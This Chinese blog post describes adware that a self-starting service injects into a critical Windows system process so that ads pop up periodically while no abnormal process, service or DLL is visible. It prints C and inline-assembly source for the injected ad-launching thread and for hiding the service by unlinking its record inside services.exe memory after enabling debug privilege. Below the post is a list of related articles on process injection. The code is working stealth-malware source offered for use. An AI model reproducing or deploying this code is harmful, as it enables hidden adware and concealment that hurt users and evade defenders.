利用服务进程注入到系统关键进程的代码,实现定期弹出广告

最新推荐文章于 2025-05-06 09:27:10 发布
翻译 最新推荐文章于 2025-05-06 09:27:10 发布 · 438 阅读 · 0

直接把代码注入到系统进程,本身是不存在进程的。

那个服务干完这事儿后,进程自动退出,服务处于停止状态。但是服务是自启动的,下次系统启动会再重复上述注入工作。

对于大多数人乃至技术人员,就跟见鬼了一样。系统里面啥异常没有,没异常服务没异常进程也没异常dll,但就是会弹广告。

不过这东西我并没有怎么使用他,是给一个朋友写的。

===============================================================

补充一下(时间久了有点记错了,隐藏服务没有用到驱动)。

注入代码大概是这样的(c结合汇编):

typedef HMODULE (__stdcall LOADLIBRARYA)( IN char lpFileName );
typedef FARPROC (__stdcall GETPROCADDRESS)( IN HMODULE hModule, IN char lpProcName );
typedef void (__stdcall *ZEROMEMORY)( IN PVOID Destination, IN SIZE_T Length ); void __stdcall CustomFunction( LPVOID my_arguments )
{
Arguments *func_args = (Arguments *)my_arguments;

  LOADLIBRARYA      LoadLibraryA = (LOADLIBRARYA)func_args->MyLoadLibrary;
  GETPROCADDRESS      GetProcAddress = (GETPROCADDRESS)func_args->MyGetAddress;

  HMODULE      h_kernel = LoadLibraryA( func_args->MyKernelDll );
  HMODULE      h_shell = LoadLibraryA( func_args->MyShellDll );       ZEROMEMORY      ZeroMemory = (ZEROMEMORY)GetProcAddress( h_kernel, func_args->MyZeroMemory );
  DWORD      MyShellExecuteA = (DWORD)GetProcAddress( h_shell, func_args->MyShellExecute );
  DWORD      MySleep;
  DWORD      sleep_time = func_args->SleepTime;       __asm
  {
        push eax
        push esp             sub esp, 6

        mov      byte ptr [esp], 'S'
        mov      byte ptr [esp+1], 'l'
        mov byte ptr [esp+2], 'e'
        mov byte ptr [esp+3], 'e'
        mov byte ptr [esp+4], 'p'
        mov byte ptr [esp+5], '\0'
        lea eax, [esp]             push eax
        push h_kernel
        call GetProcAddress
        mov  MySleep, eax             add esp, 6
        pop esp
        pop eax
  }       while( 1 )
  {
        __asm
        {
              push eax
              push esp
              push ecx
              push ebx                   sub      esp, 256                   mov      byte ptr [esp], 'o'
              mov      byte ptr [esp+1], 'p'
              mov      byte ptr [esp+2], 'e'
              mov byte ptr [esp+3], 'n'
              mov byte ptr [esp+4], '\0'
              lea      ebx, [esp]

              push SW_SHOWMAXIMIZED
              push 0
              push func_args

              mov      ecx, func_args
              add      ecx, 200h
              lea      eax, [ecx]
              push eax

              push ebx
              push 0                   call MyShellExecuteA

              add esp, 256                   pop ebx
              pop      ecx
              pop      esp
              pop      eax                   push sleep_time
              call MySleep
        }
  }

}
隐藏服务大概是这样的:

typedef struct _SC_SERVICE_PROCESS SC_SERVICE_PROCESS, *PSC_SERVICE_PROCESS;
typedef struct _SC_DEPEND_SERVICE SC_DEPEND_SERVICE, *PSC_DEPEND_SERVICE;
typedef struct _SC_SERVICE_RECORD SC_SERVICE_RECORD, *PSC_SERVICE_RECORD; typedef struct _SC_SERVICE_PROCESS
{
PSC_SERVICE_PROCESS Previous;
PSC_SERVICE_PROCESS Next;
WCHAR *ImagePath;
DWORD Pid;
DWORD NumberOfServices;
// …
} SC_SERVICE_PROCESS, *PSC_SERVICE_PROCESS; typedef struct _SC_DEPEND_SERVICE
{
PSC_DEPEND_SERVICE Next;
DWORD Unknow;
PSC_SERVICE_RECORD Service;
// …
} SC_DEPEND_SERVICE, *PSC_DEPEND_SERVICE; typedef struct _SC_SERVICE_RECORD
{
PSC_SERVICE_RECORD Previous;
PSC_SERVICE_RECORD Next;
WCHAR *ServiceName;
WCHAR *DisplayName;
DWORD Index;
DWORD Unknow0;
DWORD sErv;
DWORD ControlCount;
DWORD Unknow1;
PSC_SERVICE_PROCESS Process;
SERVICE_STATUS Status;
DWORD StartType;
DWORD ErrorControl;
DWORD TagId;
PSC_DEPEND_SERVICE DependOn;
PSC_DEPEND_SERVICE Depended;
// …
} SC_SERVICE_RECORD, *PSC_SERVICE_RECORD; BOOL SetDebugPrivilege()
{
BOOL bRet = FALSE;
HANDLE hToken = NULL;
LUID luid;
TOKEN_PRIVILEGES tp; if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken) &&
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
{
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
bRet = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
} if (hToken) CloseHandle(hToken);
return bRet;
} DWORD GetProcessIdByName(WCHAR *Name)
{
BOOL bRet = FALSE;
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32 = { 0 };
DWORD Pid = -1; hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (INVALID_HANDLE_VALUE == hProcessSnap) return -1; pe32.dwSize = sizeof(PROCESSENTRY32); if (Process32First(hProcessSnap, &pe32))
{
do
{
if ( !_wcsicmp(pe32.szExeFile, Name ) )
{
Pid = pe32.th32ProcessID;
break;
}
}
while (Process32Next(hProcessSnap, &pe32));
} CloseHandle(hProcessSnap);
return Pid;
} // 修改内存属性
void ProtectWriteDword(HANDLE hProcess, DWORD Addr, DWORD Value)
{
MEMORY_BASIC_INFORMATION mbi;
DWORD dwOldProtect, dwWritten; VirtualQueryEx(hProcess, Addr, &mbi, sizeof(mbi));
VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, PAGE_READWRITE, &mbi.Protect);
WriteProcessMemory(hProcess, Addr, &Value, sizeof(DWORD), &dwWritten);
VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, mbi.Protect, &dwOldProtect);
} //寻找服务链表
PSC_SERVICE_RECORD FindFirstServiceRecord(HANDLE hProcess)
{
WCHAR FileName[MAX_PATH+1];
HANDLE hFile, hFileMap;
UCHAR * pMap;
DWORD dwSize, dwSizeHigh, i, dwRead;
SC_SERVICE_RECORD SvcRd, pSvcRd, pRet = NULL; GetSystemDirectory( FileName, MAX_PATH );
wcscat( FileName, L”\Services.exe”); hFile = CreateFile(FileName, GENERIC_READ, FILE_SHARE_READ,
NULL, OPEN_EXISTING, 0, NULL);
if (INVALID_HANDLE_VALUE == hFile) return NULL; dwSizeHigh = 0;
dwSize = GetFileSize(hFile, &dwSizeHigh); hFileMap = CreateFileMapping(hFile, NULL, PAGE_READONLY, 0, 0, NULL);
if (NULL == hFileMap) return NULL; pMap = (UCHAR)MapViewOfFile(hFileMap, FILE_MAP_READ, 0, 0, 0);
if (NULL == pMap) return NULL; dwSize -= 12;
for (i=0; i<dwSize; ++i)
{
// 搜索services!ScGetServiceDatabase特征代码
if ((DWORD)(pMap+i) == 0xa1909090 &&
(DWORD)(pMap+i+8) == 0x909090c3)
{
#ifdef DEBUG
WCHAR tmpBuffer[256] = { 0 };
wsprintf( tmpBuffer, L”map is 0x%08x\n”, (DWORD *)(pMap+i) );
LogToFile( tmpBuffer );
#endif if (ReadProcessMemory(hProcess, (PVOID)(pMap+i+4), &pSvcRd, sizeof(PVOID), &dwRead) &&
ReadProcessMemory(hProcess, pSvcRd, &SvcRd, sizeof(SvcRd), &dwRead) &&
SvcRd.sErv == ‘vrEs’) // ServiceRecord结构的特征
{
pRet = pSvcRd; #ifdef DEBUG
WCHAR tmpBuffer[256] = { 0 };
wsprintf( tmpBuffer, L”pRet is 0x%08x\n”, (DWORD *)(pSvcRd) );
LogToFile( tmpBuffer );
#endif

                    break; 
        } 
    } 
}      UnmapViewOfFile(pMap); 
CloseHandle(hFileMap); 
CloseHandle(hFile);        //printf( “addr: 0x%08x\n”, (DWORD *)pRet );
return pRet;

} // 隐藏服务
BOOL HideService( WCHAR *Name )
{
DWORD Pid;
HANDLE hProcess;
SC_SERVICE_RECORD SvcRd, *pSvcRd;
DWORD dwRead, dwNameSize;
WCHAR SvcName[MAX_PATH] = { 0 };

dwNameSize = ( wcslen(Name) + 1 ) * sizeof(WCHAR); 

if (dwNameSize > sizeof(SvcName)) return FALSE; 

Pid = GetProcessIdByName( TEXT(“Services.exe”) );       #ifdef DEBUG
        WCHAR      tmpBuffer1[256] = { 0 };
        wsprintf( tmpBuffer1, L”Pid is %d\n”, Pid );
        LogToFile( tmpBuffer1 );
  #endif     if (Pid == -1) return FALSE;        if( ! SetDebugPrivilege() ) return FALSE;     hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid); 
if (NULL == hProcess) return FALSE;      pSvcRd = FindFirstServiceRecord(hProcess); 
if (NULL == pSvcRd) 
{ 
        #ifdef DEBUG
              LogToFile( L”Can't Find ServiceDatabase.\n” );
        #endif         CloseHandle(hProcess); 
    return FALSE; 
}        do 
{ 
        if (ReadProcessMemory(hProcess, pSvcRd, &SvcRd, sizeof(SvcRd), &dwRead) && 
        ReadProcessMemory(hProcess, SvcRd.ServiceName, SvcName, dwNameSize, &dwRead)) 
    { 
        // 匹配服务名 
        if ( 0 == _wcsicmp(SvcName, Name) ) 
        { 

            ProtectWriteDword(hProcess, (DWORD *)SvcRd.Previous+1, (DWORD)SvcRd.Next); 
            ProtectWriteDword(hProcess, (DWORD *)SvcRd.Next, (DWORD)SvcRd.Previous);                          #ifdef DEBUG
                          WCHAR      tmpBuffer2[256] = { 0 };
                          wsprintf( tmpBuffer2, L”The Service \”%s\” Is Hidden Successfully.\n”, Name );
                          LogToFile( tmpBuffer1 );
                    #endif

                    CloseHandle(hProcess); 
            return TRUE; 
        } 
    } 
    else 
    { 
        break; 
    } 
} 
while (pSvcRd = SvcRd.Next);        if( NULL != hProcess )
  {
        CloseHandle(hProcess); 
  }     return FALSE;

}

70、恶意代码与应用攻击全解析
wine的专栏
07-23 10
本文深入解析了恶意代码的来源、类型及其传播方式,详细介绍了病毒、蠕虫、特洛伊木马、间谍软件、逻辑炸弹等常见恶意代码的特点,并提供了针对各类恶意代码攻击的应对策略。同时,文章强调了及时更新杀毒软件、加强系统防护、提升用户安全意识等综合安全措施的重要性,旨在帮助用户全面了解恶意代码威胁并有效防范。
【家政平台开发(51)】家政平台上线攻略:域名解析与网站上线全流程
邓邓子的博客
04-16 548
本文为 “家政平台开发” 专栏的第五十一篇,聚焦家政平台部署发布阶段的域名解析与网站上线流程。开篇介绍域名注册流程与平台选择,分享域名命名策略及品牌保护要点。接着深入讲解 DNS 服务器选择与配置、各类域名解析记录设置,还提供解析故障排查与优化技巧。最后阐述网站上线前的内容功能检查、上线流程与应急预案制定,以及上线后的持续监测与优化。旨在为家政平台开发人员提供详尽的实操指南,助力平台平稳上线与后续良好运营。
服务Dll注入Svchost进程
08-31
程序功能:(知识点在doc中) 1、实现服务dll 2、注入到svchost进程 3、服务打开计算器(涉及到session,知识点) 4、线程输出时间debugview中查看 程序安装完服务服务启动有以下方式: 1、重启电脑,使用电脑自带svhost服务组自启动服务; 2、手动执行脚本“DriverLifeSrvDll_启动服务.bat”; 3、打开任务管理器服务管理器,手动右键启动服务
Windows线程注入——弹窗ShellCode
sandikast的专栏
01-16 2189
进行程序线程注入代码,执行一个弹窗的ShellCode。在Win7 64位之前可以完美运行,但是Win7 64位下插入的代码因为安全机制的原因无法执行,会报错! #include #include #include typedef struct _THREAD_PARA { FARPROC pFunc[2]; }THREAD_PARAM, *PTHREAD_PARAM; BY
(开源) Ring3下的DLL注入工具 x86&x64(NtCreateThreadEx + LdrLoadDll方式实现,可以注入系统进程)
Shirley068的博客
08-16 1240
工具介绍及使用请移步:http://blog.youkuaiyun.com/sunflover454/article/details/50441014 本文首发在零日安全论坛:http://www.jmpoep.com/thread-833-1-1.html 使用NtCreateThreadEx + LdrLoadDll方式实现远程线程注入的特色在于比一般的远程线程注入稳定,可以注入系统进程服务进程等。...
C++ > (开源) Ring3下的DLL注入工具 x64(NtCreateThreadEx + LdrLoadDll方式实现,可以注入系统进程)
04-28
DLL注入工具有很多,但是也有很多无法注入系统进程如explorer.exe,notepad.exe等,特别是Win7以上平台。此注入工具核心注入部分使用NtCreateThreadEx + LdrLoadDlll方式实现,特色在于比一般的远程线程注入稳定,可以注入系统进程服务进程等。 工具介绍:http://blog.youkuaiyun.com/sunflover454/article/details/50441014 开源介绍:http://blog.youkuaiyun.com/sunflover4
安全之路 —— 利用内核函数实现注入系统进程
dengdao1372的博客
03-26 495
简介 在之前的文章中曾说过利用CreateRemoteThread函数进行远线程注入是最经典的一种方式。但是这种方式却无法成功注入系统进程,因为系统进程是处在SESSION0高权限级别的会话层,用户进程在执行CreateRemoteThread函数时会失败。所以经过前辈们的研究发现,CreateRemoteThread底层会调用内核函数ZwCreateThreadEx,而系统调用此函数...
【Android安全开发关键指南】:保护家政服务系统用户数据的黄金规则
[【Android安全开发关键指南】:保护家政服务系统用户数据的黄金规则](https://i0.wp.com/www.truiton.com/wp-content/uploads/2016/04/Post-71-Android-Run-Time-Permissions.jpg?resize=950%2C530) # 摘要 随着...
Android手机中各类安全相关知识总结
数据知道的博客
03-16 6509
Android 设备的安全性需要用户、开发者和厂商共同努力。通过了解常见的安全威胁、采取有效的防护措施以及遵循最佳实践,可以显著提高 Android 设备的安全性。Android移动端的安全涉及系统架构、权限管理、数据加密、网络安全、应用开发、常见威胁防护及设备设置等多个方面。通过了解并应用上述安全知识,用户和开发者可以有效提升Android设备的安全性,保护个人隐私和数据安全。随着技术的不断发展,安全威胁也在不断演变,保持对最新安全动态的关注和持续的安全防护措施是确保Android设备安全的关键
Edge浏览器弹窗拦截全攻略:从基础设置到深度优化
最新发布
nntxthml的博客
05-06 1197
Edge浏览器的弹窗防护体系已形成从基础设置到智能分析的多层防御。普通用户通过本文前三节的配置即可解决95%的弹窗问题,开发者和企业用户则可进一步利用专业工具和组策略构建深度防护。建议定期关注Edge更新日志,及时获取最新的安全增强特性。
win7 64位dll注入注入系统进程不蓝屏
12-11
使用NtCreateThreadEx + LdrLoadDll方式实现远程线程注入的特色在于比一般的远程线程注入稳定,可以注入系统进程服务进程
windows进程注入
Armandhe的博客
07-21 413
水数量的,不过文章写的还是很牛皮,虽然有些我看不懂
关于自己写操作系统进程实现
Welcome
06-29 793
1.首先进程进程表和相关数据结构: typedef struct s_stackframe { u32 gs; /* \ */ u32 fs; /* | */ u32 es; /* |
进程注入方法详细介绍
Sumarua的博客
07-01 348
进程注入是一种技术,攻击者将恶意代码注入到合法的系统进程运行。这种方法可以使恶意代码看起来像是合法进程的一部分,从而逃避安全软件的检测。通过注入合法进程,攻击者可以利用进程的权限,并在系统中隐蔽存在。
无DLL,直接将整个EXE注入其他进程
El Psy Congroo
08-02 9811
注入代码的方式比较 注入shellcode 优点: 1. 简单,只需要EXE的一部分。代码可以用C\C++汇编写 缺点: 1. 要写位置无关代码,这意味着不能直接使用全局变量、其他编译单元的函数(包括CRT的memcpy)、API等。如果要使用则要由源进程分配空间、计算API在目标进程的地址,并传到目标进程的shellcode。者shellcode自己计算LoadLibrary和Ge...
初探进程注入
安全杂货铺
02-11 2395
十种进程注入技术研究 翻译自:https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process 简介 进程注入是一类各种恶意软件广泛使用的反检测技术,主要功能是在另一个进程的地址空间内运行自定义的代码。进...
进程注入的三种方法
benny5609的专栏
09-13 3393
一般来说,这个问题有三种可能的解决方案:  1. 把你的代码放到一个DLL中;然后用 windows 钩子把它映射到远程进程。  2. 把你的代码放到一个DLL中;然后用 CreateRemoteThread 和 LoadLibrary 把它映射到远程进程。  3. 不用DLL,直接复制你的代码到远程进程(使用WriteProcessMemory)并且用CreateRemoteThread执行之。
windows十种注入方式
全粘工程师
09-13 6596
进程注入是一种广泛应用于恶意软件和无文件攻击中的逃避技术,这需要在另一个进程的地址空间内运行自定义代码进程注入提高了隐蔽性,一些技术也实现了持久性。 尽管有许多流程注入技术,在本博客中,我提供了十种在现实看到注入另一个进程运行恶意代码的技术。 我还提供了许多这些技术的屏幕截图,以便于逆向工程和恶意软件分析,协助针对这些常见技术进行检测和防御。 1. 经典的DLL注入方式 经典的DLL注入方式:通过CREATEREMOTETHREAD和LOADLIBRARY进行注入。 这种技术是用于将恶意软件注入另一
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值